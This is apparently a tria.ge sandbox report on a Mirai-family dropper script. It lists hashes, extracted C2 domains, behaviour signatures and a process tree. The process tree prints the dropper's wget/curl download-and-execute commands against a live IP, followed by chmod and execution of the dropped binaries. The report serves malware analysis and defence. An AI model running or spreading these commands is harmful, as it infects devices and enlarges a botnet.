Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
150s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
29/12/2024, 21:37
Static task
static1
Behavioral task
behavioral1
Sample
51.79.141.121-sora.sh-2024-12-29T211113.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
51.79.141.121-sora.sh-2024-12-29T211113.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
51.79.141.121-sora.sh-2024-12-29T211113.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
51.79.141.121-sora.sh-2024-12-29T211113.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
51.79.141.121-sora.sh-2024-12-29T211113.sh
-
Size
2KB
-
MD5
0569b09a5951d5fe444efa1892b87687
-
SHA1
0d3df40a37ec718be33d83c1c9a962e982a51d17
-
SHA256
6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa
-
SHA512
fbdf5cd3d7ee86f61d205e2745661444152304f594c73562a5b7d59adfdfed3adadbb59954afb7618f64d29e283ef15e1dfaf82cef3a79dc74c08cda5580b11d
Malware Config
Extracted
mirai
CONDI
botnet.tfmobile.store
report.tfmobile.store
Signatures
-
Mirai family
-
Contacts a large (15360) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 798 chmod 838 chmod 736 chmod 902 chmod 878 chmod 870 chmod 894 chmod 803 chmod 787 chmod 844 chmod 854 chmod 862 chmod 884 chmod 753 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 737 robben /tmp/robben 755 robben /tmp/robben 789 robben /tmp/robben 799 robben /tmp/robben 804 robben /tmp/robben 839 robben /tmp/robben 845 robben /tmp/robben 855 robben /tmp/robben 863 robben /tmp/robben 871 robben /tmp/robben 879 robben /tmp/robben 885 robben /tmp/robben 895 robben /tmp/robben 903 robben -
Modifies Watchdog functionality 1 TTPs 16 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/misc/watchdog robben -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates active TCP sockets 1 TTPs 8 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben -
Writes file to system bin folder 8 IoCs
description ioc Process File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben -
Changes its process name 9 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself 8q93jt1zfs5agk5tfigrejfotzt6 839 robben Changes the process name, possibly in an attempt to hide itself kj3t6pgayuetf1wx4f54tqps 845 robben Changes the process name, possibly in an attempt to hide itself t76dir80709a7a7tzo0f 855 robben Changes the process name, possibly in an attempt to hide itself rjzohwureo9u9r6sgoirlzi15ald 863 robben Changes the process name, possibly in an attempt to hide itself pj4h3tr5ztcawcprpy5tdqp7 871 robben Changes the process name, possibly in an attempt to hide itself 3i0sywre6wu0 879 robben Changes the process name, possibly in an attempt to hide itself 5lrpgf7q0l4f 885 robben Changes the process name, possibly in an attempt to hide itself z14fqz6sky5eo2spgqgjqr9208je 895 robben Changes the process name, possibly in an attempt to hide itself rgzaziuwpd9up3apzruw60211gqu 903 robben -
Reads system network configuration 1 TTPs 8 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 739 wget 740 curl 751 cat -
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/botx.arm6 curl File opened for modification /tmp/botx.ppc440fp curl File opened for modification /tmp/botx.m68k wget File opened for modification /tmp/botx.sh4 wget File opened for modification /tmp/botx.x86 curl File opened for modification /tmp/botx.i686 curl File opened for modification /tmp/botx.arm6 wget File opened for modification /tmp/botx.ppc wget File opened for modification /tmp/botx.ppc curl File opened for modification /tmp/botx.m68k curl File opened for modification /tmp/botx.mpsl wget File opened for modification /tmp/botx.arm5 wget File opened for modification /tmp/botx.arm7 curl File opened for modification /tmp/botx.arm5 curl File opened for modification /tmp/botx.arm7 wget File opened for modification /tmp/botx.sh4 curl File opened for modification /tmp/robben 51.79.141.121-sora.sh-2024-12-29T211113.sh File opened for modification /tmp/botx.i468 curl File opened for modification /tmp/botx.mpsl curl File opened for modification /tmp/botx.x86_64 curl File opened for modification /tmp/botx.arm4 curl File opened for modification /tmp/botx.x86 wget File opened for modification /tmp/botx.mips wget File opened for modification /tmp/botx.mips curl
Processes
-
/tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh/tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh1⤵
- Writes file to tmp directory
PID:703 -
/usr/bin/wgetwget http://51.79.141.121/where/botx.x862⤵
- Writes file to tmp directory
PID:706
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/catcat botx.x862⤵PID:735
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.x86 robben2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:737
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:740
-
-
/bin/catcat botx.mips2⤵
- System Network Configuration Discovery
PID:751
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 robben2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:755
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.x86_642⤵PID:758
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/catcat botx.x86_642⤵PID:786
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:789
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.i4682⤵PID:790
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/catcat botx.i4682⤵PID:797
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.mips botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:799
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.i6862⤵PID:800
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/catcat botx.i6862⤵PID:802
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:804
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.mpsl2⤵
- Writes file to tmp directory
PID:805
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/catcat botx.mpsl2⤵PID:837
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:839
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.arm42⤵PID:841
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:845
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.arm52⤵
- Writes file to tmp directory
PID:849
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:855
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.arm62⤵
- Writes file to tmp directory
PID:857
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:863
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.arm72⤵
- Writes file to tmp directory
PID:865
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:871
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.ppc2⤵
- Writes file to tmp directory
PID:873
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:879
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.ppc440fp2⤵PID:881
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.ppc440fp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:885
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.m68k2⤵
- Writes file to tmp directory
PID:889
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:895
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.sh42⤵
- Writes file to tmp directory
PID:897
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.sh4 botx.x86 botx.x86_64 robben2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
PID:903
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
50KB
MD51092f7846a6ca7a5e92ece0ea93ff82e
SHA1140fd3e84c49d382e6b0f9a40730d1cd465f8347
SHA256a5ddb64df4b96bfeae6860981f98b4845df83db34ffaf238548bede6067f15c2
SHA51211ba6cdfba1784d5f2895f351def8d6a4dc0d5efd56b735978d1ff7416d2a52da07931250f37311362c8d522f7db89e3ac8bf1de890302afa6281ce2a2f6b2ba
-
Filesize
71KB
MD5b5aeba1a09f5198a71db73371f6e01b6
SHA1246b98370fdf429e94ab4ca087828acabbbebd9c
SHA2567a81d936e21b859c70565eddf8e6e50658f6dff077a53adb0ec3cf313ce9f71f
SHA51268db247b59d9fe3e030d56e48f2032c6e0d4bf203aef4e850da7dcda7185e60370fa577f2b97f9b6026b0599ae35ecca9fb48c8ace300d9820fb6a16b5722c57
-
Filesize
215B
MD50797a2600ddc5e8572bfb37b8af0aa29
SHA14f7fc88100b7896f12d953c0b7dd18f516e573d1
SHA2561f1fe3f0ef586643c0c73185c744b40b31c4241a90a30a0880c866dbc04fe538
SHA5120298488cf573edce6fa015e17439f3ed66285dfc5b908017e95c3a71f44f1f1949a64f69cb1ac8b64cb9e8c28c15ca0b35e8cd04265ffcae3f736f7151ef6dec
-
Filesize
213B
MD551b807212d0b7e7a9a37e4536b2d0133
SHA1f130ad0c7f78e1a99f76ed36c003cb5cac871843
SHA25694bf03444a7262f62fc6b9ca294b0cdb3bcf96d03fe1d5bdf286ddea26759c11
SHA512a86a291fbeeeae74466791679a9a22e9224a03e3a625676d678e9a11ca887c792ba8496dbac6e40fd3b289258698d7c5b882f33c89630532f7570de16bffd2e4
-
Filesize
213B
MD5033d284ddf80a0d366e8d7543fc26df4
SHA1fe4845a1d864f47c5d0e330a8fd9eaf7759aa9f5
SHA256f45f2580c1af1c5c96a1aa6a312b2079c21c1b929f418b91d9bf323a57f89aa8
SHA512e58e6f5200b6a9022c93da8d13a1a2bf2b50ad6fd5f1144e9979ae66adf9a441a796adebdd9cef942abeadb8ed42a5242c24dca330cb77730269233ff8839fb2
-
Filesize
71KB
MD5a3f985a018e2ddfc97ce78fcea072bce
SHA1409ea4c6827193bd9724d48e6fd39715ea86b0bd
SHA25656979f6909591f377fbf808bbddf134d1b0aff03e869f7fa7da7bdebe037475d
SHA512bd16a7d1b4e58f62a2c6ab536ec7fe43aff8a9c19a976475119b4c42fa56de773ef110576bf371c47bc393f7cf396b82c81ed75ef76849319285bdbfd34209be